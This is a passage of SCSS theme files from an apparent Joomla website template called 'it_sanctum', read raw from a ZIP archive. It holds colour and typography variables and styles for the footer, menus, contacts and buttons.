$maintop-heading-color:						#282828 !default;

// System Messsages
$systemmessages-background-color:			#ffffff !default;
$systemmessages-background-image:			false !default;
$systemmessages-background-repeat:			no-repeat !default;
$systemmessages-background-size:			auto !default;
$systemmessages-background-attachment:		scroll !default;
$systemmessages-text-color:					#959595 !default;
$systemmessages-heading-color:				#282828 !default;

// Sidebar
$sidebar-background-color:					#ffffff !default;
$sidebar-background-image:					false !default;
$sidebar-background-repeat:					no-repeat !default;
$sidebar-background-size:					auto !default;
$sidebar-background-attachment:				scroll !default;
$sidebar-text-color:						#959595 !default;
$sidebar-heading-color:						#282828 !default;

// Mainbody
$mainbody-background-color:					#ffffff !default;
$mainbody-background-image:					false !default;
$mainbody-background-repeat:				no-repeat !default;
$mainbody-background-size:					auto !default;
$mainbody-background-attachment:			scroll !default;
$mainbody-text-color:						#959595 !default;
$mainbody-heading-color:					#282828 !default;

// Aside
$aside-background-color:					#ffffff !default;
$aside-background-image:					false !default;
$aside-background-repeat:					no-repeat !default;
$aside-background-size:						auto !default;
$aside-background-attachment:				scroll !default;
$aside-text-color:							#959595 !default;
$aside-heading-color:						#282828 !default;

// MainBottom
$mainbottom-background-color:				#f7f7f7 !default;
$mainbottom-background-image:				false !default;
$mainbottom-background-repeat:				no-repeat !default;
$mainbottom-background-size:				auto !default;
$mainbottom-background-attachment:			scroll !default;
$mainbottom-text-color:						#959595 !default;
$mainbottom-heading-color:					#282828 !default;

// Extension
$extension-background-color:				#ffffff !default;
$extension-background-image:				false !default;
$extension-background-repeat:				no-repeat !default;
$extension-background-size:					auto !default;
$extension-background-attachment:			scroll !default;
$extension-text-color:						#959595 !default;
$extension-heading-color:					#282828 !default;

// Additional
$additional-background-color:				#f7f7f7 !default;
$additional-background-image:				false !default;
$additional-background-repeat:				no-repeat !default;
$additional-background-size:				auto !default;
$additional-background-attachment:			scroll !default;
$additional-text-color:						#959595 !default;
$additional-heading-color:					#282828 !default;

// PreBottom
$prebottom-background-color:				#ffffff !default;
$prebottom-background-image:				false !default;
$prebottom-background-repeat:				no-repeat !default;
$prebottom-background-size:					auto !default;
$prebottom-background-attachment:			scroll !default;
$prebottom-text-color:						#959595 !default;
$prebottom-heading-color:					#282828 !default;

// Bottom
$bottom-background-color:					#f7f7f7 !default;
$bottom-background-image:					false !default;
$bottom-background-repeat:					no-repeat !default;
$bottom-background-size:					auto !default;
$bottom-background-attachment:				scroll !default;
$bottom-text-color:							#959595 !default;
$bottom-heading-color:						#282828 !default;

// AfterBottom
$afterbottom-background-color:				#ffffff !default;
$afterbottom-background-image:				false !default;
$afterbottom-background-repeat:				no-repeat !default;
$afterbottom-background-size:				auto !default;
$afterbottom-background-attachment:			scroll !default;
$afterbottom-text-color:					#959595 !default;
$afterbottom-heading-color:					#282828 !default;

// Last
$last-background-color:						#ffffff !default;
$last-background-image:						false !default;
$last-background-repeat:					no-repeat !default;
$last-background-size:						auto !default;
$last-background-attachment:				scroll !default;
$last-text-color:							#959595 !default;
$last-heading-color:						#282828 !default;

// Footer
$footer-background-color:					#282828 !default;
$footer-background-image:					false !default;
$footer-background-repeat:					no-repeat !default;
$footer-background-size:					cover !default;
$footer-background-attachment:				scroll !default;
$footer-text-color:							#6f6f6f !default;
$footer-heading-color:						#ffffff !default;

// Copyright
$copyright-background-color:				#ffffff !default;
$copyright-background-image:				false !default;
$copyright-background-repeat:				no-repeat !default;
$copyright-background-size:					auto !default;
$copyright-background-attachment:			scroll !default;
$copyright-text-color:						#959595 !default;
$copyright-heading-color:					#959595 !default;

// Off Canvas
$offcanvas-background:						#ffffff !default;
$offcanvas-text-color:						#959595 !default;
$offcanvas-toggle-color:					#959595 !default;
$offcanvas-overlay:							rgba(0, 0, 0, 0.6) !default;

// Block Variations
$box1-background:							#ffffff !default;
$box2-background:							#e0e0e0 !default;

// System Messsages and Alerts
$warning-color:								#c09853;
$error-color:								#b94a48;
$info-color:								#3a87ad;
$success-color:								#468847;

// Typography
$rule-color:								#F0F2F4;
$code-text:									#d05;
$code-bg:									#fafafa;
$pre-text:									#237794;
$pre-bg:									#f8f8f8;

// Borders
$border-color-hover:						darken($base-border-color, 10%);
$border-color-focus:						$accent-color-1;

// Shadows
$base-box-shadow: 							inset 0 1px 3px hsla(0, 0%, 0%, 0.06);
PK!4���.it_sanctum/scss/configuration/_typography.scssnu&1i�// Font Family
$fonts-body-font:				"Lato", "Helvetica", "Tahoma", "Geneva", "Arial", sans-serif !default;
$fonts-heading-font:			"Cormorant SC", "Helvetica", "Tahoma", "Geneva", "Arial", sans-serif !default;
$fonts-menu-font:				"Cormorant SC", "Helvetica", "Tahoma", "Geneva", "Arial", sans-serif !default;
$font-family-mono: 				"Menlo", "Monaco", monospace;
$font-family-serif:				"Georgia", "Times", "Times New Roman", serif;

// Font Weights
$font-weight-regular:			400;
$font-weight-medium:			500;
$font-weight-bold:				700;

// Base Sizes
$fontsizes-body-font-size:		0.9rem !default;
$core-line-height:				1.5 !default;

// Heading Sizes
$h1-font-size:					$fontsizes-body-font-size*3 !default;
$h2-font-size:					$fontsizes-body-font-size*2.3 !default;
$h3-font-size:					$fontsizes-body-font-size*2 !default;
$h4-font-size:					$fontsizes-body-font-size*1.5 !default;
$h5-font-size:					$fontsizes-body-font-size !default;
$h6-font-size:					$fontsizes-body-font-size*0.9 !default;

// Menu Sizes
$fontsizes-menu-font-size:		1rem !default;PK!��%//'it_sanctum/scss/configuration/_nav.scssnu&1i�// Dropdowns
$menu-col-width:			180px !default;PK!7��ww(it_sanctum/scss/configuration/_base.scssnu&1i�// Core
@import "core";

// Navigation
@import "nav";

// Colors
@import "colors";

// Typography
@import "typography";PK!Th���'�'.it_sanctum/scss/configuration/_colors_old.scssnu&1i�// Basics
$white:										#ffffff;
$black:										#000000;
$off-white:									#f7f7f7;

// Base
$base-background-color:						#ffffff !default;
$base-text-color:							#959595 !default;
$base-border-color:							#dddddd !default;
$base-title-color:							#282828 !default;
$base-element-color:						#dddddd !default;
$base-background-image:						false !default;
$base-background-repeat:					no-repeat !default;
$base-background-size:						auto !default;
$base-background-attachment:				scroll !default;

// Accents
$accent-color-1:							#c91f37 !default;
$accent-color-2:							#282828 !default;

// Drawer
$drawer-background-color:					#ffffff !default;
$drawer-background-image:					false !default;
$drawer-background-repeat:					no-repeat !default;
$drawer-background-size:					auto !default;
$drawer-background-attachment:				scroll !default;
$drawer-text-color:							#959595 !default;
$drawer-heading-color:						#282828 !default;

// Top
$top-background-color:						#ffffff !default;
$top-background-image:						false !default;
$top-background-repeat:						no-repeat !default;
$top-background-size:						auto !default;
$top-background-attachment:					scroll !default;
$top-text-color:							#959595 !default;
$top-heading-color:							#282828 !default;

// Header
$header-background-color:					#ffffff !default;
$header-background-image:					false !default;
$header-background-repeat:					no-repeat !default;
$header-background-size:					auto !default;
$header-background-attachment:				scroll !default;
$header-text-color:							#959595 !default;
$header-heading-color:						#282828 !default;

// Navigation
$navigation-background-color:				#ffffff !default;
$navigation-background-image:				false !default;
$navigation-background-repeat:				no-repeat !default;
$navigation-background-size:				auto !default;
$navigation-background-attachment:			scroll !default;
$navigation-text-color:						#959595 !default;
$navigation-heading-color:					#959595 !default;

// Breadcrumb
$breadcrumb-background-color:				#ffffff !default;
$breadcrumb-background-image:				false !default;
$breadcrumb-background-repeat:				no-repeat !default;
$breadcrumb-background-size:				auto !default;
$breadcrumb-background-attachment:			scroll !default;
$breadcrumb-text-color:						#959595 !default;
$breadcrumb-heading-color:					#282828 !default;

// Fullwidth
$fullwidth-background-color:				#f7f7f7 !default;
$fullwidth-background-image:				false !default;
$fullwidth-background-repeat:				no-repeat !default;
$fullwidth-background-size:					auto !default;
$fullwidth-background-attachment:			scroll !default;
$fullwidth-text-color:						#959595 !default;
$fullwidth-heading-color:					#282828 !default;

// Showcase
$showcase-background-color:					#ffffff !default;
$showcase-background-image:					false !default;
$showcase-background-repeat:				no-repeat !default;
$showcase-background-size:					auto !default;
$showcase-background-attachment:			scroll !default;
$showcase-text-color:						#6f6f6f !default;
$showcase-heading-color:					#282828 !default;

// Intro
$intro-background-color:					#f7f7f7 !default;
$intro-background-image:					false !default;
$intro-background-repeat:					no-repeat !default;
$intro-background-size:						auto !default;
$intro-background-attachment:				scroll !default;
$intro-text-color:							#959595 !default;
$intro-heading-color:						#282828 !default;

// Feature
$feature-background-color:					#ffffff !default;
$feature-background-image:					false !default;
$feature-background-repeat:					no-repeat !default;
$feature-background-size:					auto !default;
$feature-background-attachment:				scroll !default;
$feature-text-color:						#959595 !default;
$feature-heading-color:						#282828 !default;

// Subfeature
$subfeature-background-color:				#f7f7f7 !default;
$subfeature-background-image:				false !default;
$subfeature-background-repeat:				no-repeat !default;
$subfeature-background-size:				auto !default;
$subfeature-background-attachment:			scroll !default;
$subfeature-text-color:						#959595 !default;
$subfeature-heading-color:					#282828 !default;

// Utility
$utility-background-color:					#ffffff !default;
$utility-background-image:					false !default;
$utility-background-repeat:					no-repeat !default;
$utility-background-size:					auto !default;
$utility-background-attachment:				scroll !default;
$utility-text-color:						#959595 !default;
$utility-heading-color:						#282828 !default;

// Maintop
$maintop-background-color:					#f7f7f7 !default;
$maintop-background-image:					false !default;
$maintop-background-repeat:					no-repeat !default;
$maintop-background-size:					auto !default;
$maintop-background-attachment:				scroll !default;
$maintop-text-color:						#959595 !default;
$maintop-heading-color:						#282828 !default;

// System Messsages
$systemmessages-background-color:			#ffffff !default;
$systemmessages-background-image:			false !default;
$systemmessages-background-repeat:			no-repeat !default;
$systemmessages-background-size:			auto !default;
$systemmessages-background-attachment:		scroll !default;
$systemmessages-text-color:					#959595 !default;
$systemmessages-heading-color:				#282828 !default;

// Sidebar
$sidebar-background-color:					#ffffff !default;
$sidebar-background-image:					false !default;
$sidebar-background-repeat:					no-repeat !default;
$sidebar-background-size:					auto !default;
$sidebar-background-attachment:				scroll !default;
$sidebar-text-color:						#959595 !default;
$sidebar-heading-color:						#282828 !default;

// Mainbody
$mainbody-background-color:					#ffffff !default;
$mainbody-background-image:					false !default;
$mainbody-background-repeat:				no-repeat !default;
$mainbody-background-size:					auto !default;
$mainbody-background-attachment:			scroll !default;
$mainbody-text-color:						#959595 !default;
$mainbody-heading-color:					#282828 !default;

// Aside
$aside-background-color:					#ffffff !default;
$aside-background-image:					false !default;
$aside-background-repeat:					no-repeat !default;
$aside-background-size:						auto !default;
$aside-background-attachment:				scroll !default;
$aside-text-color:							#959595 !default;
$aside-heading-color:						#282828 !default;

// MainBottom
$mainbottom-background-color:				#f7f7f7 !default;
$mainbottom-background-image:				false !default;
$mainbottom-background-repeat:				no-repeat !default;
$mainbottom-background-size:				auto !default;
$mainbottom-background-attachment:			scroll !default;
$mainbottom-text-color:						#959595 !default;
$mainbottom-heading-color:					#282828 !default;

// Extension
$extension-background-color:				#ffffff !default;
$extension-background-image:				false !default;
$extension-background-repeat:				no-repeat !default;
$extension-background-size:					auto !default;
$extension-background-attachment:			scroll !default;
$extension-text-color:						#959595 !default;
$extension-heading-color:					#282828 !default;

// Additional
$additional-background-color:				#f7f7f7 !default;
$additional-background-image:				false !default;
$additional-background-repeat:				no-repeat !default;
$additional-background-size:				auto !default;
$additional-background-attachment:			scroll !default;
$additional-text-color:						#959595 !default;
$additional-heading-color:					#282828 !default;

// PreBottom
$prebottom-background-color:				#ffffff !default;
$prebottom-background-image:				false !default;
$prebottom-background-repeat:				no-repeat !default;
$prebottom-background-size:					auto !default;
$prebottom-background-attachment:			scroll !default;
$prebottom-text-color:						#959595 !default;
$prebottom-heading-color:					#282828 !default;

// Bottom
$bottom-background-color:					#f7f7f7 !default;
$bottom-background-image:					false !default;
$bottom-background-repeat:					no-repeat !default;
$bottom-background-size:					auto !default;
$bottom-background-attachment:				scroll !default;
$bottom-text-color:							#959595 !default;
$bottom-heading-color:						#282828 !default;

// AfterBottom
$afterbottom-background-color:				#ffffff !default;
$afterbottom-background-image:				false !default;
$afterbottom-background-repeat:				no-repeat !default;
$afterbottom-background-size:				auto !default;
$afterbottom-background-attachment:			scroll !default;
$afterbottom-text-color:					#959595 !default;
$afterbottom-heading-color:					#282828 !default;

// Last
$last-background-color:						#ffffff !default;
$last-background-image:						false !default;
$last-background-repeat:					no-repeat !default;
$last-background-size:						auto !default;
$last-background-attachment:				scroll !default;
$last-text-color:							#959595 !default;
$last-heading-color:						#282828 !default;

// Footer
$footer-background-color:					#282828 !default;
$footer-background-image:					false !default;
$footer-background-repeat:					no-repeat !default;
$footer-background-size:					cover !default;
$footer-background-attachment:				scroll !default;
$footer-text-color:							#6f6f6f !default;
$footer-heading-color:						#ffffff !default;

// Copyright
$copyright-background-color:				#ffffff !default;
$copyright-background-image:				false !default;
$copyright-background-repeat:				no-repeat !default;
$copyright-background-size:					auto !default;
$copyright-background-attachment:			scroll !default;
$copyright-text-color:						#959595 !default;
$copyright-heading-color:					#959595 !default;

// Off Canvas
$offcanvas-background:						#ffffff !default;
$offcanvas-text-color:						#959595 !default;
$offcanvas-toggle-color:					#959595 !default;
$offcanvas-overlay:							rgba(0, 0, 0, 0.6) !default;

// Block Variations
$box1-background:							#ffffff !default;
$box2-background:							#e0e0e0 !default;

// System Messsages and Alerts
$warning-color:								#c09853;
$error-color:								#b94a48;
$info-color:								#3a87ad;
$success-color:								#468847;

// Typography
$rule-color:								#F0F2F4;
$code-text:									#d05;
$code-bg:									#fafafa;
$pre-text:									#237794;
$pre-bg:									#f8f8f8;

// Borders
$border-color-hover:						darken($base-border-color, 10%);
$border-color-focus:						$accent-color-1;

// Shadows
$base-box-shadow: 							inset 0 1px 3px hsla(0, 0%, 0%, 0.06);
PK!��Vz��$it_sanctum/scss/sanctum/_footer.scssnu&1i�#g-footer {
	padding: $section-padding 0;
	background-color: $footer-background-color;
	@if $footer-background-image {
    	background-image: url($footer-background-image);
    	background-repeat: unquote($footer-background-repeat);
    	background-size: unquote($footer-background-size);
    	background-attachment: unquote($footer-background-attachment);
	}
	color: $footer-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $footer-heading-color;
	}
	a {
		color: lighten($footer-text-color, 20%);
		&:hover {
			color: $white;
		}
	}
	.g-title {
		&:before, &:after {
			display: none;
		}
	}
	
	.g-contacts {
		.g-contacts-item {
			.g-contacts-icon {
			
			}
		}
	}
	
	.g-features2-particle {
		.g-features2-particle-item {
			flex-basis: 100%;
			margin-bottom: ($content-margin + $content-padding);
				&:last-child {
					margin-bottom: 0;
				}
		}
		.g-features2-particle-title {
			font-size: 1.875rem;
			line-height: 2rem;
		}
		.g-features2-particle-icon {
			color: $white;
			font-size: 90%;
		}
	}
	
	.g-social {
		a {
			padding: 0.625rem;
			width: 3rem;
			height: 3rem;
			line-height: 1.5rem;
			color: $copyright-text-color;
			margin: 0;
			border: none;
			background: rgba(0,0,0,0.2);
			text-align: center;
			@include transition(background 0.2s);
			&:first-child {
				border: none;
			}
			&:hover {
				color: $accent-color-1;
				background: $white;
			}
		}
	}
}

@media print {
	#g-footer {
		background: #fff !important;
		color: #000 !important;
	}
}PK!�,oo*it_sanctum/scss/sanctum/_onepage-menu.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-element-color: #f8f9fa !default;

.g-onepage-menu {
	ul {
		margin: 0;
		list-style: none;
		background: #ffffff;
		border: 1px solid $base-border-color;
		border-radius: 3px;
		li {
			a {
				padding: 0.625rem 1.25rem;
				color: $base-text-color;
				display: block;
				border-bottom: 1px solid $base-border-color;
				@include transition(all, 0.2s);
				&:hover {
					background: $base-element-color;
					color: darken($base-text-color, 20%);
				}
				i {
					margin-right: 5px;
				}
			}
			&:last-child {
				a {
					border-bottom: none;
				}
			}
			.submenu {
				border: none;
				display: none;
				&.uk-active {
					display: block;
					a {
						padding-left: 35px;
					}					
				}
				li {
					&:last-child {
						border-bottom: 1px solid $base-border-color;
					}
				}
			}
			&.uk-active {
				> a {
					background: $base-element-color;
					color: $accent-color-1;
				}
				.submenu {
					display: block;
					a {
						padding-left: 35px;
					}
				}
			}
		}
	}
}PK!m�P���*it_sanctum/scss/sanctum/_contentarray.scssnu&1i�.g-content-array {
    margin-left: -($content-padding);
    margin-right: -($content-padding);

    .g-grid {
        margin-bottom: ($content-padding + $content-margin) * 1.5;

        &:last-child {
            margin-bottom: 0;

            .g-block {
                &:last-child {
                    .g-array-item {
                        @include breakpoint(mobile-only) {
                            margin-bottom: 0;
                        }
                    }
                }
            }
        }

        @include breakpoint(mobile-only) {
            margin-bottom: 0;
        }
    }

    .g-content {
        margin: 0;
        padding-top: 0;
        padding-bottom: 0;
    }

    .g-array-item {
        @include breakpoint(mobile-only) {
            margin-bottom: ($content-margin + $content-padding) * 1.5;
        }
    }

    .g-array-item-image {
        margin: 0 0 15px 0;
    }

    .g-item-title {
        margin: 0;
    }

    .g-array-item {
        &-details, &-text, &-read-more {
            margin: 15px 0 0;
        }
    }

    .g-array-item-details {
        font-size: 90%;

        > span {
            margin-right: 10px;
        }

        i {
            margin-right: 5px;
        }
    }
}
PK!�*~~&it_sanctum/scss/sanctum/_core_old.scssnu&1i�body, #g-page-surround {
	color: $base-text-color;
	background-color: $base-background-color;
	@if $base-background-image {
    	background-image: url($base-background-image);
    	background-repeat: unquote($base-background-repeat) !important;
    	background-size: unquote($base-background-size) !important;
    	background-attachment: unquote($base-background-attachment);
	}
	-webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

#g-page-surround {
	box-shadow: 0 0 15px rgba(0, 0, 0, 0.4);
}

@media print {
	#g-page-surround {
		background: #fff !important;
		color: #000 !important;
	}
}

a {
	color: $accent-color-1;
	@include transition(color 0.2s);
	&:hover {
		color: darken($accent-color-1, 15%);
	}
}

h1, h2, h3, h4, h5, h6, strong {
	color: $base-title-color;
}

.button {
	display: inline-block;
	padding: 0.5rem 1rem;
	border-radius: $core-border-radius;
	background: $accent-color-1;
	color: $white;
	border: 1px solid $accent-color-1;
	line-height: $core-line-height;
	font-size: $fontsizes-body-font-size;
	vertical-align: middle;
	text-shadow: none;
	box-shadow: none;
	text-align: center;
	@include transition(background 0.2s);
	&:hover {
		color: $white;
		background: darken($accent-color-1, 8%);
	}
	&:active, &:focus {
		color: $white;
		background: darken($accent-color-1, 6%);
	}
	&.dark {
		background: $base-title-color;
		border: 1px solid $base-title-color;
		&:hover, &:active, &:focus {
			background: lighten($base-title-color, 12%);
		}
	}
	&.empty {
		background: none;
		border: 1px solid $accent-color-1;
		color: $accent-color-1;
		@include transition(all 0.2s);
		&:hover {
			color: #ffffff;
			background: $accent-color-1;
		}
	}
}

.button {
	&.button-grey {
		background: #a8a8a8;
		color: $white;
		border: 1px solid #a8a8a8;
		&:hover {
			background: darken(#a8a8a8, 6%);
			border: 1px solid darken(#a8a8a8, 6%);
		}
	}
	&.button-green {
		background: #4f953b;
		border: 1px solid #4f953b;
		&:hover {
			background: darken(#4f953b, 6%);
			border: 1px solid darken(#4f953b, 6%);
		}
	}
	&.button-orange {
		background: #f26d5b;
		border: 1px solid #f26d5b;
		&:hover {
			background: darken(#f26d5b, 6%);
			border: 1px solid #f26d5b;
		}
	}
	&.button-purple {
		background: #8283a7;
		border: 1px solid #8283a7;
		&:hover {
			background: darken(#8283a7, 6%);
			border: 1px solid darken(#8283a7, 6%);
		}
	}
	&.button-blue {
		background: #2b90d9;
		border: 1px solid #2b90d9;
		&:hover {
			background: darken(#2b90d9, 6%);
			border: 1px solid darken(#2b90d9, 6%);
		}
	}
	&.button-xlarge {
		font-size: 1.4rem
	}
	&.button-large {
		font-size: 1.2rem
	}
	&.button-small {
		font-size: 0.8rem
	}
	&.button-xsmall {
		font-size: 0.7rem
	}
	&.button-block {
		display: block;
	}
}

.g-title {
	margin-top: -5px;
	margin-bottom: 30px;
	position: relative;
	&:after {
		content:"";
		height: 1px;
		width: 70px;
		margin: 20px 0;
		display: block;
		background: $base-border-color;
	}
}

#g-offcanvas, .g-particle-intro {
	.g-title {
		&:before, &:after {
			display: none;
		}
	}
}

#g-aside, #g-sidebar {
	.g-title {
		font-size: $fontsizes-body-font-size*1.5;
		margin-top: 0;
		margin-bottom: 25px;
		&:before, &:after {
			width: 60px;
			@include breakpoint(tablet-range) {
				display: none;
			}
		}
	}
	.text-center, .title-center {
		.g-title {
			&:before, &:after {
				width: 40px;
			}
		}
	}
	.g-content {
		> div {
			margin-bottom: 50px;
			&:last-child {
				margin-bottom: 0;
			}
		}
	}
}

// Border utility classes
.border-bottom {
	border-bottom: 1px solid $base-border-color;
}

.border-top {
	border-top: 1px solid $base-border-color;
}

.g-logo {
	margin: 10px 0;
	> .g-content {
		margin-top: 0;
		margin-bottom: 0;
	}
	display: inline-block;
	@include breakpoint(mobile-only) {
		display: block;
		text-align: center;
	}
	img {
		width: auto;
	}
}

.logo-large {
	display: inline-block;
}

// Grid Gutter Utility Class
.g-gutter {
	margin-left: -($content-padding);
	margin-right: -($content-padding);
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
}

//Fullwidth Utility Class
.fullwidth-section {
	padding: 0 !important;
	> .g-container {
		width: 100%;
	}
	.g-content {
		padding: 0;
		margin: 0;
	}
}

// Center Vertical Utility Classes
.g-center-vertical {
	@include display(flex);
	@include align-items(center);
}

// Fix for Tooltip text styling
.tooltip {
	h1, h2, h3, h4, h5, h6, strong {
		color: #ffffff !important;
	}
}

// DEMO - Presets Menu classes
.presets-demo {
	.g-dropdown {
		.g-menu-item-container {
			&:before {
				content: "";
				position: absolute;
				width: 20px;
				height: 20px;
				margin-top: 2px;
				border-radius: 0px;
				background: #000000;
				border: 1px solid #ffffff;
			}
			.g-menu-item-content {
				margin-left: 30px;
			}
		}
		.preset1 {
			.g-menu-item-container {
				&:before {
					background: #c91f37;
				}
			}
		}
		.preset2 {
			.g-menu-item-container {
				&:before {
					background: #4f953b;
				}
			}
		}
		.preset3 {
			.g-menu-item-container {
				&:before {
					background: #f26d5b;
				}
			}
		}
		.preset4 {
			.g-menu-item-container {
				&:before {
					background: #8283a7;
				}
			}
		}
		.preset5 {
			.g-menu-item-container {
				&:before {
					background: #2b90d9;
				}
			}
		}
		.preset6 {
			.g-menu-item-container {
				&:before {
					background: #f2aa0f;
				}
			}
		}
	}
}

#g-mobilemenu-container {
	.presets-demo {
		.g-dropdown {
			.g-go-back {
				.g-menu-item-container {
					&:before {
						content: "\f053";
						position: relative;
						width: 1.28571em;
						height: auto;
						margin-top: 0;
						border-radius: 0;
						background: none;
					}
					.g-menu-item-content {
						margin-left: 30px;
					}
				}
			}
		}
	}
}PK!�9S�oo&it_sanctum/scss/sanctum/_contacts.scssnu&1i�// Set the variable defaults in case they are missing in the template
$top-background-color: #e9e9e9 !default;
$top-text-color: #666666 !default;

.g-contacts {
	.g-grid {
		margin-left: -($content-padding);
		margin-right: -($content-padding);
	}
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
	.g-contacts-item {
		text-align: left;
		@include breakpoint(mobile-only) {
			margin-left: 0 !important;
			margin-right: 0 !important;
			display: block !important;
			&:last-child {
				margin-bottom: 0 !important;
			}
		}
	}
	&.vertical {
		.g-contacts-item {
			display: block;
		}
	}
	&.horizontal {
		.g-contacts-item {
			&:not(.g-block) {
				display: inline-block;
				margin-right: 35px;
				&:last-child {
					margin-right: 0;
				}
			}
		}
	}
	&.style1 {
		.g-contacts-item {
			@include breakpoint(mobile-only) {
				margin-bottom: 7px;
			}			
		}
		.g-contacts-icon {
			margin-right: 5px;
		}
		&.vertical {
			.g-contacts-item {
				margin-bottom: 7px;
				&:last-child {
					margin-bottom: 0;
				}
			}
		}
	}
	&.style2 {
		.g-contacts-item {
			@include breakpoint(mobile-only) {
				margin-bottom: 25px;

				&:not(.g-block) {
					.g-contacts-icon {
						margin-top: 0 !important;
					}
				}
			}
			&.g-block {
				align-self: center;
			}
		}
		&.horizontal {
			.g-contacts-item {
				&:not(.g-block) {
					.g-contacts-icon {
						margin-top: -5px;
					}
				}
			}
		}
		.g-contacts-icon {
			float: left;
			border: 2px solid $base-border-color;
			border-radius: 50%;
			font-size: 18px;
			height: 45px;
			line-height: 45px;
			text-align: center;
			width: 45px;
			color: $accent-color-1;
			> span {
				position: relative;
				top: -1px;
			}
		}
		.g-title-value-container {
			margin-left: 60px;
		}
		.g-contact-title {
			margin-top: -5px;
			margin-bottom: 0;
		}
		&.vertical {
			.g-contacts-item {
				margin-bottom: 25px;
				&:last-child {
					margin-bottom: 0;
				}
			}			
		}
	}
}

// Top Section Adjustments
#g-top {
	.g-contacts {
		.g-contacts-item {
			display: inline-block;
			padding: 11px 15px;
			border-right: 1px solid lighten($top-background-color, 10%);
			margin-left: -4px;
			margin-bottom: 0;
			&:first-child {
				border-left: 1px solid lighten($top-background-color, 10%);
				margin-left: 0;
			}
			&:last-child {
				margin-right: 0;
			}
			> a {
				color: $top-text-color;
				&:hover {
					
				}
			}
		}
	}
}

// Offcanvas Section Adjustment
#g-offcanvas {
	.g-contacts {
		.g-contacts-item {
			margin-left: 0 !important;
			margin-right: 0 !important;
			display: block !important;
			&:last-child {
				margin-bottom: 0 !important;
			}				
		}
		&.style1 {
			.g-contacts-item {
				margin-bottom: 7px;
			}
		}
		&.style2 {
			.g-contacts-item {
				margin-bottom: 25px;
				&:not(.g-block) {
					.g-contacts-icon {
						margin-top: 0 !important;
					}
				}
			}
		}
		.g-block {
			@include flex-grow(0);
			@include flex-basis(100%);
		}
	}
}

// RTL Adjustments
[dir="rtl"] {
	#g-top {
		.g-contacts {
			.g-contacts-item {
				border-right: none;
				border-left: 1px solid lighten($top-background-color, 10%);
				&:first-child {
					border-right: 1px solid lighten($top-background-color, 10%);
				}
			}
		}
	}

	.g-contacts {
		.g-contacts-item {
			text-align: right;
		}
		&.horizontal {
			.g-contacts-item {
				&:not(.g-block) {
					display: inline-block;
					margin-left: 35px;
					margin-right: 0;
					&:last-child {
						margin-left: 0;
					}
				}
			}
		}
		&.style1 {
			.g-contacts-icon {
				margin-left: 5px;
				margin-right: 0;
			}
		}
		&.style2 {
			.g-contacts-icon {
				float: right;
			}
			.g-title-value-container {
				margin-right: 60px;
				margin-left: 0;
			}
		}
	}
}PK!`�pv�
�
(it_sanctum/scss/sanctum/_bs-buttons.scssnu&1i�// Bootstrap Buttons
#g-page-surround, #g-offcanvas {
	.btn {
		display: inline-block;
		padding: 0.5rem 1rem;
		border-radius: $core-border-radius;
		color: $base-text-color;
		background: transparent;
		border: 1px solid lighten($base-text-color,15%);
		line-height: $core-line-height;
		font-size: $fontsizes-body-font-size;
		vertical-align: middle;
		text-shadow: none;
		box-shadow: none;
		text-align: center;
		@include transition(all 0.2s);
		&:hover {
			background: $base-text-color;
			color: $white;
			border-color: $base-text-color;
		}
		&:active, &:focus {
			background: $base-text-color;
			color: $white;
		}
		&.btn-primary {
			color: $white;
			background: $accent-color-1;
			border: 1px solid $accent-color-1;
			&:hover, &:active, &:focus {
				background: $base-title-color;
				color: $white;
				border: 1px solid $base-title-color;
			}
		}
		&.btn-info {
			color: $white;
			background: #5bc0de;
			border-color: #5bc0de;
			&:hover, &:active, &:focus {
				background: lighten(#5bc0de,10%);
				border-color: lighten(#5bc0de,10%);
			}
		}
		&.btn-success {
			color: $white;
			background: #2ecc71;
			border-color: #2ecc71;
			&:hover, &:active, &:focus {
				background: lighten(#2ecc71,10%);
				border-color: lighten(#2ecc71,10%);
			}
		}
		&.btn-warning {
			color: $white;
			background: #f39c12;
			border-color: #f39c12;
			&:hover, &:active, &:focus {
				background: lighten(#f39c12,10%);
				border-color: lighten(#f39c12,10%);
			}
		}
		&.btn-danger {
			color: $white;
			background: #c0392b;
			border-color: #c0392b;
			&:hover, &:active, &:focus {
				background: lighten(#c0392b,10%);
				border-color: lighten(#c0392b,10%);
			}
		}
		&.btn-inverse {
			color: $white;
			background: #2c3e50;
			border-color: #2c3e50;
			&:hover, &:active, &:focus {
				background: lighten(#2c3e50,10%);
				border-color: lighten(#2c3e50,10%);
			}
		}
		&.btn-link {
			color: $accent-color-1;
			background: transparent;
			border: none;
			padding: initial;
			&:hover, &:active, &:focus {
				color: darken($accent-color-1, 15%);
			}
		}
		&.btn-large {
			font-size: $fontsizes-body-font-size*1.25;
			padding: 0.8rem 1.3rem;

		}
	}
	.btn-group {
		> .btn {
			border-radius: 0;
		}
		> .btn:first-child {
			@include border-left-radius($core-border-radius);
		}
		> .btn:last-child {
			@include border-right-radius($core-border-radius);
		}
	}

	// Joomla Read More Button and Search Page Button
	.readmore, .search-form-results {
		.btn {
			background: $accent-color-1;
			color: $white;
			border: none;
			@include transition(background 0.2s);
			&:hover, &:active, &:focus {
				background: #282828;
				color: $white;
			}
		}
	}
	.search-form-results {
		.btn {
			line-height: 1.5;
		}
	}
}PK!#��7<
<
(it_sanctum/scss/sanctum/_typography.scssnu&1i�// Font Import
@include import-font($fonts-body-font);
@include import-font($fonts-heading-font);
@include import-font($fonts-menu-font);

body {
	font-family: get-font-family($fonts-body-font);
	font-weight: $font-weight-regular;
	font-size: $fontsizes-body-font-size;
}

h1, h2, h3, h4, h5, h6 {
	font-family: get-font-family($fonts-heading-font);
	font-weight: $font-weight-medium;
	margin-top: -5px;
}

h1 {
	font-size: $fontsizes-body-font-size*3;
}
h2 {
	font-size: $fontsizes-body-font-size*2.3;
}
h3 {
	font-size: $fontsizes-body-font-size*2;
}
h4 {
	font-size: $fontsizes-body-font-size*1.5;
}
h5 {
	font-size: $fontsizes-body-font-size;
}
h6 {
	font-size: $fontsizes-body-font-size*0.9;
}

.g-main-nav {
	font-family: get-font-family($fonts-menu-font);
	font-weight: $font-weight-regular;
	font-size: $fontsizes-menu-font-size;
}

.g-main-nav .g-dropdown {
	font-size: $fontsizes-menu-font-size*0.9;
}

bold, strong {
	font-weight: $font-weight-bold;
}

.button {
